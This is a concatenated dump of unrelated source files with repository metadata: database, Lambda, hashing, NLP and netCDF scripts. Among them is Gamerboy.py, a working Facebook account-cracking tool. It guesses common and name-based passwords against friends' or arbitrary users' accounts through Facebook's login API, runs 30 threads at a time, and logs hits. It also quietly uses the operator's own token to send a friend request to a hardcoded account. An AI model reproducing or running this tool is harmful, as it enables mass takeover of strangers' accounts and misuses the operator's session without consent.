import sys
from model_state import Base, State
from sqlalchemy import (create_engine)
from sqlalchemy.orm import sessionmaker
if __name__ == "__main__" and len(sys.argv) == 4:
# create the uri of database
db_uri = 'mysql+mysqldb://{}:{}@localhost:3306/{}'.format(
sys.argv[1], sys.argv[2], sys.argv[3])
# configure Session class with desired options
Session = sessionmaker()
# TODO: pool_pre_ping
# feature will normally emit SQL equivalent to “SELECT 1” each time a
# connection is checked out from the pool; if an error is raised that
# is detected as a “disconnect” situation, the connection will be
engine = create_engine(db_uri, pool_pre_ping=True)
Base.metadata.create_all(engine)
# associate it with our custom Session class
Session.configure(bind=engine)
# work with the session
session = Session()
for state in session.query(State).order_by(State.id).all():
print('{}: {}'.format(state.id, state.name))
|
[
"andressantiagore@gmail.com"
] |
andressantiagore@gmail.com
|
f5bc5a546cdf725a09773ed38cb30dc83ce155f2
|
059863dff0c7ee0704d644e5c1fd164f422a2935
|
/upload-portfolio-lambda.py
|
bb0b666b8b687ac92c2a696d41ea299c36a1fafd
|
[] |
no_license
|
scrubs1979/my-portfolio
|
f80de0624a4f9a739d7d0461209970dd7915c05c
|
9662b4903614315e125455954405e8a9fb154aa0
|
refs/heads/master
| 2021-05-14T12:24:42.650293
| 2018-03-08T05:16:17
| 2018-03-08T05:16:17
| 116,408,226
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,066
|
py
|
def lambda_handler(event, context):
import boto3
import io
import zipfile
import mimetypes
sns = boto3.resource('sns')
topic = sns.Topic('arn:aws:sns:us-east-1:209335604342:deployPortfolioTopic')
try:
s3 = boto3.resource('s3')
portfolio_bucket = s3.Bucket('portfolio.nicholashopkins.info')
build_bucket = s3.Bucket('portfoliobuild.nicholashopkins.info')
portfolio_zip = io.BytesIO()
build_bucket.download_fileobj('portfoliobuild.zip', portfolio_zip)
with zipfile.ZipFile(portfolio_zip) as myzip:
for nm in myzip.namelist():
print(nm)
with zipfile.ZipFile(portfolio_zip) as myzip:
for nm in myzip.namelist():
obj = myzip.open(nm)
print "Job done!"
topic.publish(Subject="Portfolio deployed", Message="Portfolio deployed successfully!")
except:
topic.publish(Subject="Portfolio Deploy Failed", Message="The Portfolio was not deployed successfully!")
raise
return 'Hello from Lambda'
|
[
"nth819@gmail.com"
] |
nth819@gmail.com
|
9eac46d32932eb433a745020a70c3a966d2f9ecf
|
a4376ca539d6e78dfce225c74ee9b320d53dfac1
|
/models/LM_LG/train.py
|
c95ade475bda90622b92f6fd3c0646080a0846c4
|
[] |
no_license
|
Vietdung113/underthesea.word_sent
|
867172a14c02bc1d357dbfb4ae861a95d5b04c85
|
cb7ae2b046de2e83b6eafac089de2b24f274b164
|
refs/heads/master
| 2021-01-17T11:52:43.683592
| 2017-03-28T07:04:58
| 2017-03-28T07:04:58
| 84,049,336
| 0
| 0
| null | 2017-03-06T08:37:07
| 2017-03-06T08:37:07
| null |
UTF-8
|
Python
| false
| false
| 1,555
|
py
|
from os.path import dirname
from os.path import join
from underthesea.corpus import PlainTextCorpus
# pre-process
from models.crf_model.transformer import Transformer
punctuation = open("punctuation.txt", "r").read().split('\n')
# to sentence
def count_underscore(word):
count = 0
for token in word.split('_'):
count += 1
return count
def documents_to_sentences(documents):
result_sentence = []
for document in documents:
for sentence in document.sentences:
result_sentence.append(sentence)
return result_sentence
def sent2vec(sentence):
vector = []
words = []
for word in sentence.split(' '):
if "_" in word:
for i in range(count_underscore(word) - 1):
vector.append(1)
words.append(word)
vector.append(0)
words.append(word)
return vector, words
transformer = Transformer()
train_sents = transformer.load_train_sents()
corpus = PlainTextCorpus()
folder = join(dirname(dirname(dirname(__file__))), "data", "raw", "train", "output")
corpus.load(folder)
total_sentences = documents_to_sentences(corpus.documents)
total_vec = []
vector = []
total_vector = []
total_words = []
for sentence in total_sentences[:-2]:
total_vec.append(sent2vec(sentence))
for sentence in total_sentences[:-2]:
words = []
for word in sentence.split(' '):
if '_' in word:
for x in word.split('_'):
words.append(x)
words.append(word)
total_words.append(words)
print 0
|
[
"doanvietdung273@gmail.com"
] |
doanvietdung273@gmail.com
|
999cee0cbb39d8437d31f33f059f976251ca8ba3
|
78bdb461b09f0dbccad474f069fe7dec829c70e3
|
/venv/Lib/site-packages/tailor/internal/execution/__init__.py
|
972e62315e5bdac2b1caf67f609aaa2b219814cd
|
[] |
no_license
|
OdaNilseng/FLSworkflow
|
92d7a9b9d63398517f927fd2a0514eaef787e110
|
780a998741991f17ce14d5b642b228495681e415
|
refs/heads/master
| 2022-12-03T13:04:36.542191
| 2020-08-21T08:55:53
| 2020-08-21T08:55:53
| 289,224,383
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 64
|
py
|
# -*- coding: utf-8 -*-
from .serialrunner import SerialRunner
|
[
"oed@sevanssp.com"
] |
oed@sevanssp.com
|
19d98f499819e67e2b301ea262b005ee741efaad
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2542/58610/244701.py
|
f657012ffa6f32eee9c2f07eca344df262997dbc
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 410
|
py
|
nums = eval(input())
hash_dict = dict()
max_len = 0
for num in nums:
if num not in hash_dict:
left = hash_dict.get(num - 1, 0)
right = hash_dict.get(num + 1, 0)
temp_len = left + right + 1
max_len = max_len if temp_len < max_len else temp_len
hash_dict[num] = temp_len
hash_dict[num + right] = temp_len
hash_dict[num - left] = temp_len
print(max_len)
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
bc1a2292f22bba054ad14b3e8d09eab1f46b6d6b
|
42be401188f048b84f97e083afcfe4ed772a45c6
|
/Gamerboy.py
|
6f7a66c122bf1bd4197ec4c91a2e3b82ef614ecd
|
[] |
no_license
|
aftabgit786/gamer
|
df3bb4db1638efe91418717ae0e6329d613e323a
|
19873d1f9523adb81c74225b43f095619ae146b1
|
refs/heads/master
| 2022-10-02T04:45:58.380391
| 2020-06-05T14:32:17
| 2020-06-05T14:32:17
| 269,662,526
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,633
|
py
|
#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """ -----------------------------•◈•
( __)\\ ____--------------_------------•◈•
|__(~) •||•THE - GAMER -OFFICAL------•◈•
|__\~~) •||•GAME - WORLD---------------•◈•
|__(-----\ •◈•------GAMER--------•◈•
|__~~~\ •◈•-----█-------⑦-------█------•◈•
|__~~~\ •◈•-----█-------⑧-------█------•◈•
|__~~~\ •◈•-----█-------⑥-------█------•◈•
\033[1;91m=======================================
\033[1;96mAuthor \033[1;93m: \033[1;92Gamer Boy
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://github.com/Therana/zero
\033[1;91m======================================="""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[●] \x1b[1;93mSedang masuk \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print "\033[1;96m ============================================================="
print """\033[1;91m=======================================
\033[1;96mAuthor \033[1;93m: \033[1;92mRana Aahil
\033[1;96mInstagram \033[1;93m: \033[1;92mFlowRana
\033[1;96mFacebook \033[1;93m: \033[1;92m Aahilrana4072
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://Github.com/Therana/zero
\033[1;91m======================================="""
print " \x1b[1;93m============================================================="
CorrectUsername = "GAMERBOY"
CorrectPassword = "lovegame"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[☆] \x1b[1;93mUsername Of Tool \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[☆] \x1b[1;93mPassword Of Tool \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as " + username
loop = 'false'
else:
print "Wrong Password"
os.system('xdg-open https://www.Youtube.com/UCsdJQbRf0xpvwaDu1rqgJuA')
else:
print "Wrong Username"
os.system('xdg-open https://www.Youtube.com/UCsdJQbRf0xpvwaDu1rqgJuA')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[☆] \x1b[1;93mLOGIN WITH FACEBOOK \x1b[1;96m[☆]' )
id = raw_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Successful'
os.system('xdg-open https://www.Facebook.com/Omi6t')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mIt seems that your account has a checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mIt seems that your account has a checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Start Hacking"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Exit "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Crack From Friend List"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;93m Crack From Any Public ID"
print "\x1b[1;96m[\x1b[1;92m3\x1b[1;96m]\x1b[1;93m Crack From File"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Back"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[✺] \033[1;93mGetting ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mEnter ID \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mName\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mID Not Found!"
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mGetting IDs \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mEnter File Path \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile Not Found'
raw_input('\n\x1b[1;96m[ \x1b[1;97mBack \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal IDs \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;96m[✺] \033[1;93mStarting \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCracking \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mTo Stop Process Press CTRL Then Press z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = ('786786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = b['first_name'] + '12'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['first_name'] + '1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name'] + '1122'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mProcess Has Been Completed \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File Has Been Saved \033[1;91m: \033[1;97mout/checkpoint.txt")
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
menu()
if __name__ == '__main__':
login()
|
[
"noreply@github.com"
] |
aftabgit786.noreply@github.com
|
369d48ff237aaa397d17503fcbc6269012a892a0
|
69c27255a714c406cdb2f673b5f78bcdfc56e668
|
/vezba07/z2.py
|
2c94ae248d91a401cb3f3478038f7200125fcd39
|
[] |
no_license
|
stefan9x/pa
|
fcb1f59043a8d2710978c5393f18cde5c418de25
|
6123502f5629375723cf6eda4a9eb93e27ff0659
|
refs/heads/master
| 2020-04-25T05:18:05.547692
| 2019-06-14T20:24:57
| 2019-06-14T20:24:57
| 172,537,624
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,408
|
py
|
import math
import random
import time
class Data:
def __init__(self, key):
self.key = key
self.literal = str(key)
def __str__(self):
return str(self.key)
def randList(min, max, num):
l = []
for i in range(num):
rand = random.randint(min, max)
l.append(rand)
return l
def h1(k, m):
return k.key % m
def h2(k, m):
return 1 + (k.key % (m - 1))
def linProb(k, m, i):
return (h1(k, m) + i) % m
def quadProb(k, m, i):
c1 = c2 = 1/2
return (h1(k, m) + c1 * i + c2 * i * i) % m
def doubleHash(k, m):
return (h1(k, m) + h2(k, m)) % m
def hashInsert(T, k, m):
i = 0
while(i != m):
j = linProb(k, m, i)
if T[j] == None or T[j] == "deleted":
T[j] = k
return j
else:
i += 1
return -1
def hashSearch(T, k, m):
i = 0
while True:
j = linProb(k, m, i)
if T[j].key == k.key:
return j
i += 1
if T[j] == None or i == m:
return None
# Dodatni zadatak
def hashDelete(T, k, m):
j = hashSearch(T, k, m)
T[j] = "deleted"
if __name__ == "__main__":
for n in [10000, 50000, 100000]:
L = randList(0, n*2, n)
for m in [n, n//2, n//4]:
T = [None] * m
startTime = time.perf_counter()
print("\n")
for l in L:
k = Data(l)
res = hashInsert(T, k, m)
if res == -1:
print("Hash overflow")
break
endTime = time.perf_counter() - startTime
print("Time for table form(n=%d, m=%d):" %(n, m), endTime)
r = random.randint(0, n)
src = Data(L[r])
print("Searching for %d" %(src.key))
startTime = time.perf_counter()
src_res = hashSearch(T, src, m)
endTime = time.perf_counter() - startTime
if src_res != None:
print("Found! Took:", endTime)
else:
print("Not Found! Took:", endTime)
#delete testing
'''for t in T:
print(t)
hashDelete(T, src, m)
for t in T:
print(t)'''
|
[
"stefanj94@live.com"
] |
stefanj94@live.com
|
2ccb1c92186cd0395ec86eeae1b6090e27711a20
|
4e8b2ea63c201ff50f6ce76eeb3649e5e1dd68f3
|
/src/00_hello.py
|
f4da22fb5b904db9f339fb8006780670a67d5971
|
[] |
no_license
|
DanielFirpo/Intro-Python-I
|
badd427560f32d6f9acc68b339880776b5e27dfb
|
6c03efcb8d0048c4feb6ef54ffb2b5b3e6f6abf3
|
refs/heads/master
| 2022-04-01T16:00:31.202434
| 2020-02-11T23:11:46
| 2020-02-11T23:11:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 63
|
py
|
# Print "Hello, world!" to your terminal
print("Hello, world.")
|
[
"trtld2@gmail.com"
] |
trtld2@gmail.com
|
d22118d55882db65321d3e871bffec9d45a6b351
|
6dd2987e853fd59f7db8f2ce9c7c012510038e85
|
/src/eumetsat/tools/compression/osi_saf_netcdf_round_floats.py
|
9ce63a8f0b11b8825a38a88daeae051258cce7b8
|
[] |
no_license
|
JoaoGRRodrigues/rodd
|
2980c62cd40362d2df9ad41bdda5b72d7b6d9002
|
235fd68d62923dfe514db182e1c4ccf7a72af5f5
|
refs/heads/master
| 2021-05-31T17:03:29.372364
| 2016-04-26T08:11:38
| 2016-04-26T08:11:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,323
|
py
|
'''
Created on Dec 2, 2010
@author: gaubert
'''
from netCDF4 import Dataset
import numpy
import subprocess
import sys
import fileinput
import tempfile
import os
import csv
import eumetsat.common.utils
from eumetsat.common.utils import ftimer
import ftplib
SERVER = 'podaac.jpl.nasa.gov'
DIRECTORY = '/GHRSST2/data/L2P/AVHRR_METOP_A/EUR/2010/340'
FILES = '*.bz2'
def list_ftp_dir(server, dir, files):
""" return a list of files from a ftp dir """
print("== list %s on %s\n" % (dir, server))
ftp = ftplib.FTP(server)
ftp.login()
ftp.cwd(dir)
res = ftp.nlst(files)
return res
def download_file(server, dir, in_file, out_filename):
""" download a file """
print("== Get file %s in %s\n" % (in_file, out_filename))
ftp = ftplib.FTP(server)
ftp.login()
ftp.cwd(dir)
result_file = open(out_filename,"wb")
ftp.retrbinary('RETR %s' %(in_file) , result_file.write)
result_file.close()
print("== End of Get file %s\n" % (in_file))
def generate_template_from_src(a_working_dir, a_input, a_output, a_nc_ver):
""" generate cdl for original nc file and modify the lat lon type to be in the new type """
create_cdl_script = "/homespace/gaubert/ecli-workspace/rodd/etc/compression/create_cdl.sh"
print("== Create cdl %s/temp.cdl\n" %(a_working_dir))
cdl_file = "%s/temp.cdl" % (a_working_dir)
res = subprocess.call([create_cdl_script, a_input, cdl_file])
if res != 0:
print("Error: Problem while creating cdl %s file from %s" % (cdl_file, a_input))
print("== Generate new nc file %s/%s\n" % (a_working_dir,a_output) )
#now create the nc file
create_nc_script = "/homespace/gaubert/ecli-workspace/rodd/etc/compression/generate_nc_file.sh"
res = subprocess.call([create_nc_script, cdl_file, "%s/%s" % (a_working_dir,a_output), str(a_nc_ver) ])
if res != 0:
print("Error: Problem while creating nc %s file from %s" % (create_nc_script))
return "%s/%s" % (a_working_dir,a_output)
def transform_osi_saf_netcdf(input_file, new_data_set, digits, debug = False):
""" Transform osi saf int netcdf """
print("================== Start transforming netCDF coordinates (precision %s) ==================" % (digits) )
old_dataset = Dataset(input_file,'a')
new_dataset = Dataset(new_data_set,'a')
o_lat = old_dataset.variables['lat']
o_lon = old_dataset.variables['lon']
o_lat_data = o_lat[:]
o_lon_data = o_lon[:]
# get dimensions from the old dataset
nj_max = len(old_dataset.dimensions['nj'])
ni_max = len(old_dataset.dimensions['ni'])
#need to create a numpy array with the right dimensions and fill it with the scale lat values
# and then the lon values
#n_data = numpy.zeros((nj_max, ni_max), dtype=int)
n_data = numpy.zeros((nj_max, ni_max), dtype=float)
nj = 0
ni = 0
print("== Start lat transformation \n")
while nj < nj_max:
while ni < ni_max:
#n_data[nj][ni] = round(o_lat_data[nj][ni], digits)*pow(10,digits)
n_data[nj][ni] = round(o_lat_data[nj][ni], digits)
ni += 1
if debug and (nj % 10) == 0:
print("debug: In nj loop %d\n" % (nj))
ni = 0
nj += 1
print("== End of lat transformation \n")
new_dataset.variables['lat'][:] = n_data
new_dataset.sync()
print("== Start lon transformation \n")
#n_data = numpy.zeros((nj_max, ni_max), dtype=int)
n_data = numpy.zeros((nj_max, ni_max), dtype=float)
#reset ni nj
ni = 0
nj = 0
while nj < nj_max:
while ni < ni_max:
#n_data[nj][ni] = round(o_lon_data[nj][ni], digits)*pow(10,digits)
n_data[nj][ni] = round(o_lon_data[nj][ni], digits)
ni += 1
if debug and (nj % 10) == 0:
